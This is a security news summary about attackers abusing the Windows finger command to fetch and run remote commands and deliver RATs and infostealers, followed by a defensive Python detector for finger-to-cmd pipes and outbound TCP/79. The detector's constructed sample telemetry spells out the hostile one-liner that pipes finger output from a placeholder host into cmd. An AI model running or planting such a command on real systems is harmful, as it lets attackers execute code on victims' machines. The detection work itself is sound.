The traditional “finger” command is being exploited by threat actors to deliver remote commands and malware on Windows devices. These attacks use the protocol to download Python malware and RATs while evading detection, highlighting the need for traffic filtering. #ClickFix #NetSupportManagerRAT
Key points
- The finger command is increasingly being exploited in cyberattacks to execute malicious scripts on Windows systems.
- Threat actors use the protocol to retrieve and pipe remote commands through cmd.exe, leading to malware downloads.
- Recent campaigns involve delivering tools like RATs and infostealers disguised as PDF files via the finger command.
- The malware first checks for malware analysis tools; if none are present, the attackers deploy remote access malware or RATs.
- Blocking outbound TCP port 79 prevents connections to finger servers and helps defenders mitigate these attacks.
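The two detection angles the points above give defenders (a finger invocation whose output is piped into cmd.exe, and any outbound TCP/79 connection) can be checked against endpoint telemetry. The following is an added example, not code from the original post; it assumes simplified Sysmon-style process-creation and network-connection fields, and the sample events are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (Sysmon-style fields, simplified). Not real captured data.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "type": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c finger user@finger.example.invalid | cmd"},
    {"id": 2, "type": "process", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger user@finger.example.invalid"},
    {"id": 3, "type": "network", "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79},
    {"id": 4, "type": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir C:\\Users"},
    {"id": 5, "type": "network", "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationIp": "198.51.100.5", "DestinationPort": 443},
]

# finger[.exe] followed by a user@host argument, at line start or after whitespace/quote/backslash.
FINGER_INVOCATION = re.compile(r'(?:^|[\s"\\])finger(?:\.exe)?\s+\S*@\S+', re.IGNORECASE)
# A pipe whose right-hand side is cmd[.exe], optionally quoted and/or given with a full path.
PIPE_TO_CMD = re.compile(r'\|\s*(?:"?[^|"]*\\)?cmd(?:\.exe)?\b', re.IGNORECASE)


def classify(event: Dict) -> Tuple[str, str]:
    """Return (severity, reason) for one event; severity is 'none', 'low' or 'high'."""
    if event["type"] == "process":
        cmd = event.get("CommandLine", "")
        image = event.get("Image", "").lower()
        if FINGER_INVOCATION.search(cmd) and PIPE_TO_CMD.search(cmd):
            return "high", "finger output piped into cmd.exe"
        if image.endswith("finger.exe") or FINGER_INVOCATION.search(cmd):
            return "low", "finger.exe executed (rare on workstations)"
    elif event["type"] == "network":
        if event.get("DestinationPort") == 79:
            return "high", "outbound TCP/79 (finger) from %s" % event.get("Image", "?")
    return "none", ""


def scan(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Return (event id, severity, reason) for every event that is not benign."""
    hits = []
    for event in events:
        severity, reason = classify(event)
        if severity != "none":
            hits.append((event["id"], severity, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Network events on TCP/79 are the more robust signal, since a process-command-line rule can be evaded by renaming or obfuscating the invocation while the outbound port cannot.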